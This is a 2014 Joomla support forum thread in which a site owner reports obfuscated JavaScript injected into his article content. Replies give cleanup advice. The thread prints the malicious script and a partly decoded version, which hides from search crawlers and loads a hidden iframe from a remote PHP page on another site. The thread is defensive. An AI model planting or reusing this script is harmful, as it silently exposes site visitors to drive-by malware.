Into content in database added malicious javascript

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
mladja04
Joomla! Intern
Joomla! Intern
Posts: 53
Joined: Wed Jul 04, 2007 2:19 am

Into content in database added malicious javascript

Post by mladja04 » Tue Jan 28, 2014 10:52 am

Hi,
I have Joomla 1.5.26 version with some components and plugins installed. Today I see that Google status of my site is malicios and that have some code which install simething. I than inspect site and find that in every added content before <hr id="system-readmore" /> tag is added bad code:

Code: Select all

<script type="text/javascript">// <![CDATA[
var 
_0xf6f1=["\x74\x6F\x4C\x6F\x63\x61\x42\x75\x69\x6C\x64\x28\x29"];function 
googleAnalyticsStatisticsBuild(){var _0xde2dx2=navigator[_0xf6f1[1]][_0xf6f1[0]]();var 
_0xde2dx3=[_0xf6f1[2],_0xf6f1[3],_0xf6f1[4],_0xf6f1[5]];for(k in 
_0xde2dx3){if(_0xde2dx2[_0xf6f1[6]](_0xde2dx3[k])!=-1){return ;} ;} ;var 
_0xde2dx4=detectBrowserSize();if(_0xde2dx4[_0xf6f1[7]]==0||_0xde2dx4[_0xf6f1[8]]==0){return ;} ;var 
_0xde2dx5=false;if(document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[9]]){_0xde2dx5=document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[9]];} 
;document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[9]]=function 
(){if(!document[_0xf6f1[13]](_0xf6f1[12])){iframe=document[_0xf6f1[15]](_0xf6f1[14]);iframe[_0xf6f1[7]]=_0xf6f1[16];iframe[_0xf6f1[8]]=_0xf6f1[16];iframe[_0xf6f1[17]]=_0xf6f1[12];iframe[_0xf6f1[18]]=_0xf6f1[19];document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[20]](iframe);} 
;if(_0xde2dx5!==false){_0xde2dx5();} ;} ;} ;function detectBrowserSize(){var _0xde2dx7=0,_0xde2dx8=0;if( typeof 
(window[_0xf6f1[21]])==_0xf6f1[22]){_0xde2dx7=window[_0xf6f1[21]];_0xde2dx8=window[_0xf6f1[23]];} else 
{if(document[_0xf6f1[24]]&&(document[_0xf6f1[24]][_0xf6f1[25]]||document[_0xf6f1[24]][_0xf6f1[26]])){_0xde2dx7=document[_0xf6f1[24]][_0xf6f1[25]];_0xde2dx8=document[_0xf6f1[24]][_0xf6f1[26]];} 
else 
{if(document[_0xf6f1[10]]&&(document[_0xf6f1[10]][_0xf6f1[25]]||document[_0xf6f1[10]][_0xf6f1[26]])){_0xde2dx7=document[_0xf6f1[10]][_0xf6f1[25]];_0xde2dx8=document[_0xf6f1[10]][_0xf6f1[26]];} 
;} ;} ;return {width:_0xde2dx7,height:_0xde2dx8};} ;setTimeout(_0xf6f1[27],500);
// ]]></script>
and when I decrypt with this http://ddecode.com/hexdecoder/ I get this:

Code: Select all

<script type="text/javascript">// <![CDATA[var _0xf6f1=["toLocaleLowerCase","userAgent","yandexbot","yandexmetrika","yandeximages","googlebot","indexOf","width","height","onmousemove","body","getElementsByTagName","googleanalyticsiframe","getElementById","iframe","createElement","12px","id","src","http://www.safe-cleaning.co.uk/modules/mod_archive/middle.php","appendChild","innerWidth","number","innerHeight","documentElement","clientWidth","clientHeight","googleAnalyticsStatisticsBuild()"];function googleAnalyticsStatisticsBuild(){var _0xde2dx2=6f1[26]])){_0xde2dx7=document[_0xf6f1[24]][_0xf6f1[25]];_0xde2dx8=document[_0xf6f1[24]][_0xf6f1[26]];} else {if(document[_0xf6f1[10]]&&(document[_0xf6f1[10]][_0xf6f1[25]]||document[_0xf6f1[10]][_0xf6f1[26]])){_0xde2dx7=document[_0xf6f1[10]][_0xf6f1[25]];_0xde2dx8=document[_0xf6f1[10]][_0xf6f1[26]];} ;} ;} ;return {width:_0xde2dx7,height:_0xde2dx8};} ;setTimeout(_0xf6f1[27],500);// ]]></script>
What I to do now?

Do you maybe know (maybe you read somewhere or opinions of users) do this problem are in this version?
Do some other user have same problem?

Thank you very much
Last edited by mandville on Tue Jan 28, 2014 1:37 pm, edited 2 times in total.
Reason: trimmed code
Top
User avatar
yellowwebmonkey
Joomla! Explorer
Joomla! Explorer
Posts: 328
Joined: Tue Nov 17, 2009 4:22 am
Location: Central Texas
Contact:
Contact yellowwebmonkey

Re: Into content in database added malicious javascript

Post by yellowwebmonkey » Tue Jan 28, 2014 8:36 pm

I would login to your phpmyadmin, go to your Joomla database and search for "<script"

Then manually go through and remove the offensive code. It is better to do in phpmyadmin because you are less likely to miss something.

After you clean it out, you will want to change your Joomla password and FTP/hosting passwords.
Top
mladja04
Joomla! Intern
Joomla! Intern
Posts: 53
Joined: Wed Jul 04, 2007 2:19 am

Re: Into content in database added malicious javascript

Post by mladja04 » Tue Jan 28, 2014 9:36 pm

Ok, thank you. I do that immediately when I see that have this bad code. Malicious code is only at end of intro in every text added on site (in table jos_content in introtext field).
I delete that code with mysql command

Code: Select all

 update jos_content set introtext = replace(introtext, ‘part of malicious code’, ‘’);
But I have problem, I can to delete on this way only one line, if in code is ENTER - new line, it don't want to delete. I can't to delete <script> enter enter enter enter enter </script> code.
But I will find answer on net.

I transfer site to new server. Today I make changes into php.ini file, make it more secured, ad Joomla request to be. In new server is new passwords.

Thank you very much for reply.
Top
Locked

Return to “Security in Joomla! 1.5”